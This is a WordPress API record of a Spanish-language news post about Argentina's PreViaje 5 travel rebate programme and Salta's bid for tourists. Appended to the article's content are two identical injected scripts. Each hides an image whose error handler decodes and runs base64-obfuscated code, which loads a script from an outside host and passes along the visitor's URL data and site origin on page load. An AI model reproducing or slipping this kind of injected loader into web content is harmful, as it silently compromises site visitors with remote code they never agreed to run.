{"id":3045,"date":"2023-09-01T11:38:02","date_gmt":"2023-09-01T14:38:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3045"},"modified":"2025-08-14T00:09:23","modified_gmt":"2025-08-14T03:09:23","slug":"previaje-5-salta-invita-a-turistas-de-todo-el-pais","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3045","title":{"rendered":"PreViaje 5: Salta invita a turistas de todo el pa\u00eds"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#66032c\"><em>El Ministerio de Turismo de la Naci\u00f3n lanz\u00f3 una nueva edici\u00f3n del programa de viajes; el periodo de compra iniciar\u00e1 este 1 de septiembre. En la cuarta edici\u00f3n, la provincia fue el destino m\u00e1s elegido.<\/em><\/h3>\n\n\n\n<p>Salta invita a turistas de todo el pa\u00eds a recorrer la provincia con los beneficios que brinda el programa PreViaje 5, cuyo periodo de compras inicia ma\u00f1ana y se extender\u00e1 hasta el 7 de septiembre, teniendo 24 horas m\u00e1s para cargar los comprobantes en la plataforma designada.<\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes de la Naci\u00f3n lanz\u00f3 la quinta edici\u00f3n del programa de viajes, para lo que estableci\u00f3 un reintegro de hasta $100.000 por persona. El beneficio puede utilizarse entre el 29 de septiembre y el 17 de octubre, incluido el feriado largo por el D\u00eda del Respeto a la Diversidad Cultural.<\/p>\n\n\n\n<p>El beneficio estar\u00e1 vigente para alojamientos, agencias de viaje, transporte, museos, parques, excursiones y alquiler de veh\u00edculos. La devoluci\u00f3n ser\u00e1 del 50% y del 70% para afiliados a PAMI, para volver a utilizar en la cadena tur\u00edstica.<\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes de Salta invita a los prestadores locales a formar parte del programa que ubic\u00f3 en la \u00faltima edici\u00f3n a la provincia como el destino nacional m\u00e1s elegido. &nbsp;<\/p>\n\n\n\n<p>Si utilizaste PreViaje en las ediciones anteriores, podr\u00e1s reutilizar la tarjeta pl\u00e1stica. M\u00e1s informaci\u00f3n en previaje.gob.ar<\/p>\n\n\n\n<p>El ministro de Turismo de la Naci\u00f3n&nbsp;<strong>Mat\u00edas Lammens<\/strong>, expres\u00f3 que \u201ceste programa es reconocido por los millones de argentinos que lo usaron\u201d e indic\u00f3 que \u201cPreViaje es una muestra cabal de un Estado presente, pero que adem\u00e1s administra con inteligencia\u201d. Asimismo, se\u00f1al\u00f3 que en esto \u201cla alianza con el sector privado es inquebrantable\u201d.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes de Salta,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, destac\u00f3 la decisi\u00f3n pol\u00edtica de mantener el programa de incentivo, por lo que significa para los destinos durante lo que antes era temporada baja. \u201cEn la cuarta edici\u00f3n Salta fue el destino m\u00e1s elegido, lo que nos permiti\u00f3 tener indicadores hist\u00f3ricos\u201d, record\u00f3 el funcionario, quien adem\u00e1s destac\u00f3 lo que significa esta actividad para la generaci\u00f3n de empleo y movilidad social, siendo los sectores p\u00fablicos y privados socios estrat\u00e9gicos.<\/p>\n\n\n\n<p>Por su parte el presidente de la C\u00e1mara de Turismo,&nbsp;<strong>Juan Lucero<\/strong>, celebr\u00f3 la vigencia de PreViaje y destac\u00f3 \u201clo que significa para los prestadores y emprendedores de toda la provincia durante temporada baja, generando empleo y crecimiento del sector. Es una gran herramienta para toda la industria tur\u00edstica y estamos que esta nueva edici\u00f3n va a ser un \u00e9xito, por lo que seguramente nuestro destino ser\u00e1 uno de los m\u00e1s elegidos nuevamente\u201d.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/previaje-5-salta-invita-a-turistas-de-todo-el-pais-91594\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo de la Naci\u00f3n lanz\u00f3 una nueva edici\u00f3n del programa de viajes; el periodo de compra iniciar\u00e1 este 1 de septiembre. En la cuarta edici\u00f3n, la provincia fue el destino m\u00e1s elegido. Salta invita a turistas de todo el pa\u00eds a recorrer la provincia con los beneficios que brinda el programa PreViaje [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3048,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-3045","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3045"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3045"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3045\/revisions"}],"predecessor-version":[{"id":6977,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3045\/revisions\/6977"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3048"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3045"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3045"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3045"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}